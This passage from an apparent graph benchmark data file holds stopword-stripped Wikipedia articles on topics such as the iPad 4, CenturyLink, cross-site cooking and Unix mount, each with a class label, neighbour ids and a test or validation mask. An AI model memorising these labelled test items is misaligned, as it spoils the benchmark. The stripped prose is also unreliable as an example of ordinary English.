across bridge met elena congratulates beating soldiers hero galbalan reawoken due seal statues broken kidnaps elena midair taunts adol telling bring statues island fortress adol goes back town doubting edgar dogi bring adol back senses adol sets rescue elena surviving many challenges adol comes platform ellena chester talking galbalan taunts chester adol arrives adol promises statues galbalan harm chester elena galbalan agrees pulls adol realm adol fights defeats galbalan rescues elena adol finds chester gone center galbalan island seal away ellena tells adol village people descendants man sealed away galbalan first time chester knows sink galbalan island adol must interfere adol understands elena leave sinking island scene shifts chester manipulating crystals sink island good tells adol take care elena sacrificing destroy island island disappears good back redmont adol dogi inn getting ready leave dogi tells adol go ahead something take care leaving early morning cause stir within community dogi chatting ellena love adol dogi leaves ellena almost stays walks inn mr. gardner asking adol dogi planning mr. gardner would like adol dogi stay adol wants adventures dogi leave walking along shore ellena runs shouts dogi adol wave goodbye elena cries text scrolls telling adventures waiting adol dogi instead top-down camera view used previous ys games ys iii uses side-scrolling platformer presentation auto-attack removed player must push button make adol attack enemies otherwise gameplay mechanics identical previous entries series statistics equipment shopping experience system magic function ys ii though spells represented rings instead wand icons mp renamed ring power neither player character enemies temporary invincibility soundtrack original version ys iii entirely composed mieko ishikawa x68000 version game introduced number additional compositions composed masaaki kawai kawai also responsible arrangements ishikawa existing compositions version falcom released number music cds dedicated music ys iii include commemorate release ys iii remake oath felghana 2005 see falcom released ys premium music cd box felghana boxed set ys iii music produced 2005 falcom released ys oath felghana microsoft windows remake ys iii oath felghana slightly modifies greatly expands story original ys iii expands dungeons extend gameplay time original side-scroller also replaced 3d game engine based used 2010 falcom released version ys oath felghana playstation portable xseed games officially released english later year followed 2012 newly localized version original 2005 pc release entertainment weekly gave game c+ wrote ys pronounced 'ease 'wise one classic role-playing games adults hard time getting used kind 're hailed savior beleaguered townspeople given sword various magical powers charged restoring peace land fill-in-the-blank point venture forth bravely get slaughtered first insignificant bug happens cross path learn fight back though ys interesting enough adventure becomes somewhat tedious since follow prearranged story line little room surprise experimentation battles even evolved creatures bugs start seem awfully repetitive youtuber neoturbomaniac reviewed turbo grafx cd version ys iii giving overall positive rating criticized game choppy parallax scrolling poor quality voice acting step positively received voice acting ys book ii said game fondness ys iii step ys book 1 2 ys fan keeps coming back fun first played 25 years ago still enjoy today say worth playing even though best game series emulation accessible way play turbo grafx cd version due high cost pf obtaining original 9:16-9:39 youtuber snes drunk commented ys iii wanderers ys super nintendo saying tough know recommend ys iii fun first games series like ys iv super famicom lot well like combat system games lot ys iii little standard guess makes little bland n't think bad game definitely flawed 2:58-3:15 youtuber aboveup spoke game negative terms also complaining poor quality voice acting ys iii compared first two games choppy parallax scrolling turbo grafx cd version game also stated boss battles wanderers ys n't well made original games said generally think ys iii wanderers ys good game game worth experiencing exception stellar soundtrack really good sprite work n't much could speak positively outside maybe jab along lines know 10:50-11:06",
    "neighbors": [
      10240,
      2249,
      10316,
      6797,
      10931
    ],
    "mask": "None"
  },
  {
    "node_id": 446,
    "label": 2,
    "text": "IPad_(4th_generation):ipad 4th generation fourth-generation ipad marketed ipad retina display colloquially referred ipad 4 tablet computer produced marketed apple inc compared predecessor third-generation ipad fourth-generation ipad maintained retina display featured new upgraded components apple a6x chip lightning connector introduced september 12 2012 shipped ios 6.0 provides platform audio-visual media including electronic books periodicals films music computer games presentations web content like ipad 2 third-generation ipad supported five major ios releases case ios 6 7 8 9 10. ios 11 released 19 september 2017 support fourth-generation ipad ios 11 drops support 32-bit devices announced media conference october 23 2012 fourth generation ipad line first released november 2 2012 35 countries december ten countries including china india brazil third generation discontinued following fourth announcement seven months general availability device available either black white front glass panel various connectivity storage options storage size options include 16 gb 32 gb 64 gb 128 gb available connectivity options wi-fi wi-fi cellular lte capabilities fourth-generation ipad received primarily positive reviews praised hardware improvements well retina display also featured device predecessor furthermore benchmarks reveal fourth-generation ipad able perform cpu-reliant tasks twice fast predecessor first weekend sales aggregated amount 3 million fourth-generation ipads ipad minis sold rumors regarding next-generation ipad emerged shortly release third-generation ipad point speculated next ipad released would smaller size speculations emerged july 2012 digitimes help unspecified sources claimed apple made small revisions upcoming ipad scheduled release late 2012 october 16 2012 apple announced media event scheduled october 23 california theatre san jose california company pre-disclose subject event widely expected regarding ipad mini photographic images device dock connector front camera emerged shortly media event media event apple ceo tim cook introduced new version ibooks new generations macbook pro mac mini imac unveiling fourth-generation ipad lower-end ipad mini unveiling apple stated fourth-generation ipad would available pre-order online selected number countries starting october 26 november 2 apple released wi-fi model device 35 countries across europe east asia north america cellular model released in-store weeks initial release device release fourth-generation ipad led discontinuation predecessor angered many third-generation ipad users response apple extended 14-day return policy 30 days itproportal noted since price models identical consumers purchased third-generation ipad within time frame effectively allowed exchange discontinued device fourth-generation model january 29 2013 apple announced scheduled launch 128 gb variant 4th generation ipad released february 5 2013 following announcement ipad air october 22 2013 sales fourth-generation ipad discontinued fourth-generation ipad reintroduced march 18 2014 following discontinuation ipad 2 order make reintroduction low-end device ipad air price cut 20 original launch price october 16 2014 fourth-generation ipad discontinued favor ipad air 2 ipad air took place entry-level ipad time fourth-generation ipad shipped ios 6.0 later ios 7 act hotspot carriers sharing internet connection wi-fi bluetooth usb also access apple app store digital application distribution platform ios service allows users browse download applications itunes store developed xcode ios sdk published apple app store garageband imovie iphoto iwork apps pages keynote numbers available ipad comes several pre-installed applications including siri safari mail photos video music itunes app store maps notes calendar game center photo booth contacts like ios devices ipad sync content data mac pc using itunes although ios 5 later managed backed without computer although tablet designed make phone calls cellular network users use headset built-in speaker microphone place phone calls wi-fi cellular using voip application skype device dictation application using voice recognition technology iphone 4s user speaks ipad types say screen though ipad must internet connection available via wi-fi cellular network due feature reliance apple servers translate speech fourth-generation ipad optional ibooks application displays books epub-format content downloaded ibookstore several major book publishers including penguin books harpercollins simon schuster macmillan committed publishing books device despite direct competitor amazon kindle barnes noble nook amazon.com barnes noble offer e-reader apps ipad 4th generation ipad unlike immediate predecessor 3rd generation ipad supported ios 10 however announced apple wwdc 2017 4th generation ipad along iphone 5/5c support ios 11. ios 10.3.3 latest final version ios include support wifi models devices ios 10.3.4 latest final version ios include support cellular models devices device apple a6x soc comprises 32-bit apple dual-core cpu running 1.4 ghz quad-core powervr sgx554mp4 gpu 1 gb ram also features 5-megapixel rear-facing camera capable 1080p video recording 720p hd front-facing videophone camera designed facetime device features 9.7 diagonal display resolution 2,048 1,536 qxga resulting 3.1 million pixels gives display pixel density 264 ppi total number pixels used display fourth-generation ipad four times ipad 2 – providing even scaling prior model previous generations iphone ipad hardware four buttons one switch fourth-generation ipad device portrait orientation home button face device display returns user home screen wake/sleep button top edge device two buttons upper right side device performing volume up/down functions switch whose function varies according device settings generally functioning either switch device silent mode lock/unlock orientation screen externally fourth-generation ipad identical predecessor apart differences dock connectors used change manufacturers produce display addition wi-fi version weighs 652 grams cellular model weighs 662 grams – 2 grams heavier respective predecessors display responds sensors ambient light sensor adjust screen brightness 3-axis accelerometer sense orientation switch portrait landscape modes unlike iphone ipod touch built-in applications work three orientations portrait landscape-left landscape-right ipad built-in applications support screen rotation four orientations including upside-down consequently device intrinsic native orientation relative position home button changes tablet manufactured either without capability communicate cellular network models connect wireless lan via wi-fi fourth-generation ipad available 16 32 64 128 gb internal flash memory expansion option apple sells camera connection kit sd card reader used transfer photos videos audio playback fourth-generation ipad frequency response 20 hz 20,000 hz without third-party software play following audio formats he-aac aac protected aac mp3 mp3 vbr audible formats 2 3 4 aea aax aax+ alac aiff wav ipad uses internal rechargeable lithium-ion polymer lipo battery hold charge 11,560 mah batteries made taiwan simplo technology 60 dynapack international technology 40 ipad designed charged relatively high current 2 amps using included 12 w usb power adapter lightning connector charged older usb port computer limited 500 milliamps 0.5 amps result ipad use powered computer may charge slowly high-power usb ports found newer computers accessories provide full charging capabilities apple claims battery provide 10 hours video audio playback web surfing wi-fi 9 hours web surfing cellular connection one month standby like rechargeable battery ipad battery loses capacity time however ipad battery user-replaceable program similar ipod iphone battery-replacement programs apple promised replace ipad hold electrical charge refurbished unit fee battery replacement process user data preserved/transferred repaired refurbished units come new case warranty refurbished unit may vary jurisdictions smart cover introduced ipad 2 screen protector magnetically attaches face ipad cover three folds allow convert stand also held together magnets smart cover also assume positions folding smart covers microfiber bottom cleans front ipad wakes unit cover removed comes five colors polyurethane expensive leather apple offers several accessories adapters proprietary lightning connector port besides headphone jack dock holds ipad angle dock connector audio line-out port ipad use bluetooth keyboards also work macs pcs ipad charged standalone power adapter wall charger compatible ipods iphones 12 watt charger included fourth-generation ipad received primarily favorable reviews critics commentators review gareth beavis techradar praised device high resolution retina display techradar wrote ... one impressive 've seen tablet date however reviewer also wrote screen lacks 'punch seen super amoled screens seen devices like samsung galaxy note 2 review also praised interface ipad simple design easy use layout additionally aspects design ipad updated soc noted praised review critically beavis noted ipad still moderately heat medium usage however extent seen third-generation ipad tim stevens engadget praised retina display labelled best screen available tablets benchmarks tests conducted engadget resulted stevens concluding fourth-generation ipad fastest apple mobile device available surpassing record iphone 5 held brief period benchmark tests conducted slashgear concluded soc fourth-generation ipad able perform cpu-reliant tasks twice fast third-generation ipad series benchmark tests conducted graphics performance fourth-generation ipad anandtech resulted device achieving highest score compared consumer mobile devices including samsung galaxy iii nexus 10 third-generation ipad performance increase fourth-generation ipad varies tests however increase nonetheless evident furthermore battery longevity tests conducted organization suggests battery fourth-generation ipad able last longer predecessor however battery updated ipad 2 able outlast fourth-generation ipad first weekend sales ipad mini fourth-generation ipad apple reported sold aggregated number 3 million units techradar noted first weekend sales figures fourth-generation ipad lower corresponding figures third-generation ipad sold 3 million units first weekend subsequent reports analysis david hsieh technology analyst suggest ipad mini selling better fourth-generation ipad despite noted slump sales apple stock price direct response figures released rose 1.4 584.62 november 5 repairability review conducted ifixit fourth-generation ipad scored 2 10 10 easiest repair due use adhesive attach components however reviewers noted several components screen battery could removed easily replacement",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      10478,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      4910,
      4399,
      7983,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      3483,
      10658,
      2979,
      9123,
      11173,
      8109,
      10675,
      2492,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 447,
    "label": 0,
    "text": "DiShIn:dishin described dishin disjunctive shared information method calculate shared information content complementing value informative common ancestor mica disjunctive ancestors exploring multiple inheritance ontology shared information content two terms ontology information science popular technique measure semantic similarity.. dishin re-defines shared information content two concepts average disjunctive ancestors assuming ancestor disjunctive difference number distinct paths concepts different informative ancestor words disjunctive ancestor informative ancestor representing given set parallel interpretations dishin improvement grasm terms computational efficiency management parallel interpretations example palladium platinum silver gold considered precious metals silver gold copper considered coinage metals thus calculating semantic similarity platinum gold dishin starts calculating number paths difference common ancestors metal two paths gold one platinum path difference one precious one path concept path difference zero since path difference distinct common ancestors metal precious considered disjunctive common ancestors calculating semantic similarity platinum palladium dishin starts calculating number paths difference common ancestors metal precious one path concept path difference zero common ancestors thus common ancestor precious informative considered disjunctive common ancestor given node-based semantic similarity measures proportional average information content common disjunctive ancestors metal precious case platinum gold precious case platinum palladium means dishin palladium platinum similar platinum gold calculating semantic similarity silver gold dishin starts calculating number paths difference common ancestors case platinum palladium common ancestors path difference zero since silver gold share relationships therefore parallel interpretations thus informative common ancestor precious coinage considered disjunctive common ancestor means dishin similarity silver gold greater equal similarity pair leaf concepts thus dishin penalize parallel interpretations grasm",
    "neighbors": [
      11206
    ],
    "mask": "Test"
  },
  {
    "node_id": 448,
    "label": 7,
    "text": "CenturyLink:centurylink centurylink inc. global technology company headquartered monroe louisiana provides communications network services security cloud solutions voice managed services customers worldwide company member p 500 index fortune 500 communications services include local long-distance voice broadband multi-protocol label switching mpls private line including special access ethernet hosting including cloud hosting managed hosting data integration video network public access voice internet protocol voip information technology ancillary services centurylink also serves global enterprise customers across north america latin america emea asia pacific centurylink ’ products services focus 3 key segments enterprise business small business residential centurylink enterprise business provides products services around network cloud security voice managed services enterprise customers centurylink ’ network services include sd wan mpls/ipvpn hybrid wan ethernet internet access wavelength services dark fiber private lines centurylink cloud provides big data service internet things iot multi-cloud management private cloud public cloud bare metal saas applications cloud connect centurylink security monitors billion security events daily services include cloud infrastructure ddos web application email web security company also provides analytics threat management risk compliance support threat research labs centurylink offers voice products ranging traditional landlines unified communications collaboration uc c services recognized 2018 frost sullivan “ growth excellence voip access sip trunking ” centurylink ’ managed services include advanced professional services consulting strategic partnerships centurylink small business provides products services around internet phone tv cloud applications centurylink residential provides internet including gigabit fiber voice tv via partnership directv company also offers bundling verizon wireless centurylink residential services available following states centurylink fiber fiber premises service united states providing broadband internet prism tv small slowly growing number locations service first introduced omaha nebraska next rolled las vegas nevada plans expansion several markets unlike company existing high speed internet deployments utilize fiber-to node/neighborhood increase speed adsl2+ speeds 20/2 mbit/s vectored vdsl2+ speeds 140/10mbit/s markets centurylink installs fiber optic cable way home business speeds 1,000 mbit/s download 1,000 mbit/s upload using calix optical network terminals feb. 2 2014 centurylink announced availability gigabit fiber service multi-tenant businesses salt lake city surrounding communities aug. 5 2014 centurylink announced expansion gigabit fiber service 16 additional markets sep 15 2015 centurylink announced expansion gigabit fiber service residential business customers six additional states increasing company service coverage select areas 17 states gigabit fiber markets may 2 2017 centurylink inc. completed previously announced sale data centers colocation business funds advised bc partners consortium including medina capital advisors longview asset management deal worth approximately 1.86 billion centurylink retaining approximately 10 equity stake consortium newly formed global secure infrastructure company cyxtera technologies centurylink second largest u.s. communications provider global enterprise customers centurylink customers 60 countries october 27 2008 embarq announced would acquired centurytel inc. all-stock transaction valued 6 billion centurytel ceo glen post would remain ceo merged company following acquisition remained ceo 2018 embarq former landline business sprint served cities 18 states including nevada florida north carolina ohio deal made centurytel third-largest landline phone provider pennsylvania behind verizon verizon pennsylvania verizon north comcast april 22 2010 centurylink point still legally known centurytel inc. announced would acquire qwest stock-for-stock transaction agreement centurylink would swap 0.1664 shares share qwest result centurylink shareholders prior merger wound 50.5 share ownership combined company former qwest shareholders gained remaining 49.5 valuation centurylink purchase 12 billion merger completed april 1 2011 addition qwest allowed centurylink become third largest telecommunications company united states largest landline phone provider state colorado new company 17 million access lines 5 million broadband customers 1.4 million video subscribers across 37 states merger also made centurylink owner one so-called baby bells qwest included us west baby bell much western united states july 15 2011 centurylink acquired savvis inc. global provider cloud infrastructure hosted services 2 billion represented outstanding shares savvis common stock 40 per share acquisition allowed centurylink provide expanded managed hosting cloud services december 4 2012 centurylink launched integrated suite cloud services called savvisdirect savvisdirect expansion centurylink ’ portfolio savvis cloud services includes cloud application hosting cloud servers cloud storage private cloud small businesses administrators developers centurylink later shuttered savvisdirect subsidiary consolidating cloud service offerings internally october 16 2012 savvis acquired ito business division ciber thereby adding managed services portfolio june 14 2013 centurylink announced acquisition appfog portland-based platform service used 100,000 developers automate deployment software public clouds amazon web services openstack november 19 2013 centurylink announced acquisition tier 3 seattle-based infrastructure service iaas platform advanced cloud management company based cloud foundry december 8 2014 centurylink announced acquisition datagardens inc. disaster recovery as-a-service draas provider based edmondton alberta canada december 11 2014 centurylink announced acquisition cognilytics predictive analytics big data service provider march 30 2016 centurylink announced acquisition netaura security services company focuses cybersecurity security information event management siem analytics vulnerability management january 9 2017 centurylink announced acquisition edison new jersey-based seal consulting leading sap services provider expanded centurylink ’ existing integrated sap capabilities hosting managed services include integration software implementation october 31 2016 centurylink announced intent acquire level 3 communications deal valued around 25 billion securing necessary regulatory approvals centurylink closed transaction november 1 2017 centurylink technology center excellence monroe la earliest predecessor centurylink oak ridge telephone company oak ridge louisiana owned f. e. hogan sr 1930 hogan sold company 75 paid subscribers william clarke marie williams 500 moved switchboard williams family front parlor 1946 williams son clarke mcrae williams received ownership family telephone company wedding gift 1947 clarke williams learned telephone company marion louisiana sale loan business associate joe sydney carter clarke purchased marion telephone company eventually made base operation grew company acquisitions centurylink still maintains offices former headquarters building company remained family-operated business became incorporated 1968 1967 oak ridge telephone company served three states 10,000 access lines year company incorporated central telephone electronics clarke m. williams served president chairman board 1972 1975 clarke gradually moved headquarters marion monroe louisiana access larger employee base near airport century telephone logo 1971 company renamed century telephone enterprises inc 1972 century telephone acquired la crosse telephone corporation wisconsin october 24 1978 century telephone moved new york stock exchange first time began trade ticker symbol ctl century telephone performed well long bear market 1970s stock rose fourfold company provided telephone service parts 14 states time 1981 century telephone acquired war telephone west virginia 1982 century telephone earnings peaked 14 million declined 1983 following early 1980s recession finally began recover 1984 however 1983 decline led loss half value company stock 1984 1985 earnings stock price recovered new record highs company accumulated 206 million long-term debt century telephone sold operations war telephone two companies colonial telephone 4.66 million 1987 stock price nearly doubled low year old 1982 record high falling back third 1987 stock market crash earnings steadily grown year 1983 low 1987 reached nearly us 20 million 1989 century telephone enterprises acquired universal telephone inc. us 90 million cash late 1980s company began long trend performed extremely well stock split three-for-two twice period earnings steadily grew 1990-1991 recession year-end 1991 reached nearly us 40 million double 1987 1992 century telephone acquired central telephone company ohio centel subsidiary 135 million acquisition served 65,000 access lines added 20 century access line total also year glen f. post iii became chief executive officer named vice chairman board century telephone 1993 century telephone revenues 425 million 350 million 1992 1993 earnings nearly 80 million 70 million 1992 excluding nearly 16 million charge 1992 due cumulative effect accounting change year also 1993 company split stock three-for-two yet however time company accumulated nearly 520 million long-term debt 1995 century telephone enterprises added p midcap 400 index earnings continued steady growth trend 1994 economic soft landing 1995 reached us 115 million long-term debt continued grow well reaching us 623 million year 1997 century telephone acquired delta security alarm co. inc. monroe louisiana largest acquisition time pacific telecom doubling size 660,000 additional telephone access lines 12 states pacific telecom inc. would continue existence renamed centurytel northwest inc 1998 century telephone split stock three-for-two company acquired another monroe louisiana security company century protection systems also acquired 89,000 access lines 19 exchanges 21 northern wisconsin communities ameritech affected customers formerly served wisconsin bell ameritech directory publishing operations serving customers also acquired 1999 company renamed centurytel inc split stock three-for-two added standard poor 500 index year former centurytel logo used company prior becoming centurylink centurytel office ann arbor michigan 2000 centurytel acquired 230,500 gte lines arkansas also bought 127,000 gte lines missouri partnership spectra communications wisconsin acquired 133,000 additional lines 70,500 access lines us 195 million verizon year centurytel also bought 62,650 lines us 170 million partnership telephone usa wisconsin llc 2001 centurytel acquired csw net inc. russellville arkansas fended hostile take-over attempt alltel inc 2002 son company original founder chairman board clarke m. williams died succeeded vice chairman glen f. post iii company sold wireless business alltel become pure-play rural local exchange carrier also year centurytel acquired 300,000 verizon access lines alabama 354,000 verizon access lines missouri bringing total operations 22 states 2.5 million access lines 2003 centurytel acquired half ownership skycomm international inc. houston texas march form satellite teleport global network access point nap system june centurytel also acquired fiber network digital teleport inc. 5,700-mile 9,200 km route running illinois texas adjoining states centurytel renamed network company lightcore closing year december centurytel acquired midwest fiber optic network mfon level 3 communications inc. december stand-alone system core central states lightcore august 2004 partnered echostar communications corporation dish network multi-channel digital tv september centurytel began relationship cingular wireless 2005 centurytel began wireless voice data service bought number fiber networks central united states kmc telecom holdings inc 2006 centurytel sold arizona assets hopi telecommunications inc. bringing total operations 23 states may 2007 centurytel acquired madison river communications based mebane nc parent company four lecs al ga il nc well clec operations il la nc lecs included mebtel communications telephone company serving alamance county north carolina gulftel communications based foley al serving baldwin surrounding counties coastal communications based hinesville ga gallatin river communications serving dixon galesburg pekin areas il late 2007 customer respect group international research consulting firm focuses corporations treat online customers ranked centurytel best among six leading communications providers june 2 2009 press release announced combined centurytel/embarq entity would called centurylink denver-based monigle associates retained formulate new brand strategy acquisition completed july 1 2009 october 19 2009 centurytel embarq brandings retired business officially conducted centurylink banner continuing trade nyse centurytel stock ticker ctl new corporate name centurylink inc. become official may 2010 federal communications commission ordered centurylink pay record 16 million failing alert authorities preventable programming error left nearly 11 million people seven states without access emergency services six hours 2014 december 2018 centurylink faced criticism requiring residential customers utah via dns hijacking view acknowledge notice advertising security parental control software could connect internet provider claimed required recently-enacted state law requires isps inform users provide ability block material harmful minors bill sponsor utah state senate member todd weiler stated law require service disrupted notice acknowledged law requires notice delivered conspicuous manner advertisement within bill invoice require disruption service december 27 2018 “ nationwide outage ” caused 9-1-1 service disrupted across country federal communications commission says investigate areas outage lasted nearly twelve hours third shutdown year following outages april november 2018 atm point sale credit card machines also widely affected",
    "neighbors": [
      10368,
      2057,
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      2965,
      2328,
      4377,
      2458,
      8986,
      11170,
      6307,
      9766,
      5159,
      1705,
      7723,
      6444,
      8495,
      1969,
      2994,
      3121,
      7352,
      1083,
      448,
      2496,
      4289,
      7490,
      1224,
      8520,
      3660,
      4429,
      7248,
      1362,
      467,
      9682,
      6367,
      3168,
      4194,
      11646,
      5732,
      10090,
      3819,
      7660,
      2802,
      8054,
      119,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 449,
    "label": 5,
    "text": "Cookie_exchange:cookie exchange cookie exchange ipsec comes oakley protocol protocol key management cookie exchange requires side send pseudorandom number cookie initial message side acknowledges acknowledgement must repeated first message diffie–hellman key exchange source address forged opponent gets answer thus opponent force user generate acknowledgements perform diffie–hellman calculation note cookies sense ipsec unrelated http cookies used web browsers recommended method creating cookie perform fast hash e.g md5 ip source destination addresses udp source destination ports locally generated secret value",
    "neighbors": [
      5472,
      7965,
      3742
    ],
    "mask": "None"
  },
  {
    "node_id": 450,
    "label": 4,
    "text": "Cross-site_cooking:cross-site cooking cross-site cooking type browser exploit allows site codice_1 set cookie codice_2 cookie domain another site codice_3 cross-site cooking used perform session fixation attacks malicious site fixate session identifier cookie another site attack scenarios may also possible example codice_1 may know security vulnerability codice_3 exploitable using cookie security vulnerability requires e.g administrator password codice_1 know cross-site cooking could used fool innocent users unintentionally perform attack cross site cross-site cooking similar concept cross-site scripting cross-site request forgery cross-site tracing cross-zone scripting etc. involves ability move data code different web sites cases e-mail instant messages sites problems linked fact web browser shared platform different information applications sites logical security boundaries maintained browsers ensures one site corrupt steal data another however browser exploit cross-site cooking used move things across logical security boundaries name cross-site cooking concept presented michał zalewski 2006 name mix cookie cross-site attempting describe nature cookies set across sites michał zalewski article 2006 benjamin franz credited discovery may 1998 reported cookie domain related vulnerability vendors benjamin franz published vulnerability discussed mainly way circumvent privacy protection mechanisms popular browsers michał zalewski concluded bug 8 years later still present unresolved browsers could exploited cross-site cooking various remarks vendors ... certainly hurry fix made zalewski others",
    "neighbors": [
      10466,
      2470,
      4198,
      8200,
      2931,
      2099,
      6938,
      7965
    ],
    "mask": "Test"
  },
  {
    "node_id": 451,
    "label": 6,
    "text": "Mount_(Unix):mount unix computing mount command various operating systems user access file unix-like machine file system contains needs mounted mount command frequently mount used sd card usb storage dvd removable storage devices command also available efi shell mount command instructs operating system file system ready use associates particular point overall file system hierarchy mount point sets options relating access mounting makes file systems files directories devices special files available use available user counterpart umount instructs operating system file system disassociated mount point making longer accessible may removed computer important umount device removing since changes files may partially written completed part umount mount umount commands require root user privilege effect changes alternately specific privileges perform corresponding action may previously granted root user file system defined user mountable codice_1 file root user display mounted partitions example mount second partition hdd hard disk drive unmount referring physical disk partition referring mount point remount partition specific options codice_2 wrapper around standard mount program permits normal users mount removable devices without matching /etc/fstab entry provides robust basis automounting frameworks like gnome utopia project keeps usage root minimum package also contains wrapper pmount-hal reads information device labels mount options hal passes pmount codice_3 package contains programs mounting unmounting ejecting storage devices goal gnome-mount gnome software gnome-volume-manager gnome-vfs use instead invoking mount/umount/eject/pmount direct hal invoking methods gnome previously used pmount note gnome-mount intended direct use users gnome-mount programs utilize hal methods run unprivileged rationale gnome-mount centralized place gconf settings mount options mount locations maintained unix-like commands options specific version mount precisely detailed man page addition system call mount function mount_root mounts first root filesystem context mount called system call setup",
    "neighbors": [
      2432,
      515,
      516,
      9733,
      4615,
      3976,
      5256,
      9735,
      652,
      4750,
      5397,
      2198,
      6812,
      6138,
      9762,
      7847,
      4398,
      7983,
      11568,
      8115,
      10933,
      823,
      1336,
      8631,
      6075,
      7356,
      965,
      8522,
      3659,
      7379,
      10967,
      9946,
      7136,
      6369,
      8675,
      8676,
      9444,
      10087,
      6120,
      491,
      10476,
      7534,
      4850,
      8306,
      5492,
      9204,
      9972,
      506,
      5759
    ],
    "mask": "None"
  },
  {
    "node_id": 452,
    "label": 2,
    "text": "BNU_(software):bnu software bnu high-performance communications device driver designed provide enhanced support serial port communications bnu serial port driver specifically targeted use early late 1980s 1990s dos-based bbs software reason bnu similar enhanced serial port drivers provide better support serial communications software offered machine bios and/or dos used machine serial port support provided bnu similar drivers allowed communications software programmers spend time actual applications instead depths details talk serial ports modems connected sending communications data across modem link lot involved sending data serial printer basically originally capable done existing serial port software support bnu written david nugent experimental driver serial communications following fossil specification david released bnu public 1989 use bbs world spread rapidly bnu one two three available fossil drivers ibm pc compatible hardware ms-dos/pc dos operating system bnu one widely used ms-dos fossil communications drivers bnu mainly used dos-based bulletin board system bbs software written late 1980s mid-1990s used windows-based bbs software bnu used windows ntvdm run dos-based bbs software windows bnu similar drivers limited solely used bbs world enhanced capabilities offered also used easily communicate serially connected devices reasons fossil specification fossil drivers originally created reason noted separate details serial port communications actual application software programmers needed talk serial driver standardized way send receive data name bnu originally rip-off bnu uucp context meant basic networking utilities author bnu david nugent felt acronym particularly apt bnu function bnu also called bloody nugent utility written david nugent one many bbs related utilities known time acronym bnu actually stood bnufaq used posted fidonet bnu support echo author saved text file last official posting faq david nugent bnu author",
    "neighbors": [
      9525,
      9166
    ],
    "mask": "Validation"
  },
  {
    "node_id": 453,
    "label": 3,
    "text": "Register_memory_architecture:register memory architecture computer engineering register–memory architecture instruction set architecture allows operations performed memory well registers architecture allows operands memory registers combinations called register plus memory architecture register–memory approach one operands add operation may memory register differs load/store architecture used risc designs mips operands add operation must registers add examples register memory architecture ibm system/360 successors intel x86 examples register plus memory architecture vax motorola 68000 family",
    "neighbors": [
      7173,
      9739,
      7699,
      5655,
      10781,
      8231,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      7858,
      9911,
      11447,
      8890,
      4286,
      2241,
      2243,
      5329,
      10966,
      731,
      7911,
      10985,
      9964,
      5358,
      8944,
      1776,
      757,
      2805,
      10485,
      249,
      1798,
      10508,
      6926,
      6415,
      1298,
      6950,
      309,
      8501,
      5948,
      4928,
      8514,
      6476,
      7505,
      9044,
      11604,
      8543,
      1376,
      10603,
      4465,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5523,
      409,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      3014,
      466,
      1499,
      1502,
      5090,
      995,
      9707,
      10734,
      6639,
      499,
      4596,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 454,
    "label": 7,
    "text": "WORKetc:worketc worketc cloud-based crm business management platform small medium businesses company founded 2009 daniel barnett son colin barnett headquartered sydney australia company founded 2009 daniel barnett company went name veetro changing name worketc 2008 worketc headquartered australia operates micro-multinational enterprise consists team 12 working australia america canada china philippines worketc ranked 75 2013 deloitte technology fast500 asia pacific 2016 company announced planned list asx worketc cloud-based saas application combines crm project management billing help desk collaboration modules one business management platform worketc able integrate xero quickbooks g suite evernote microsoft outlook",
    "neighbors": [
      6367
    ],
    "mask": "None"
  },
  {
    "node_id": 455,
    "label": 3,
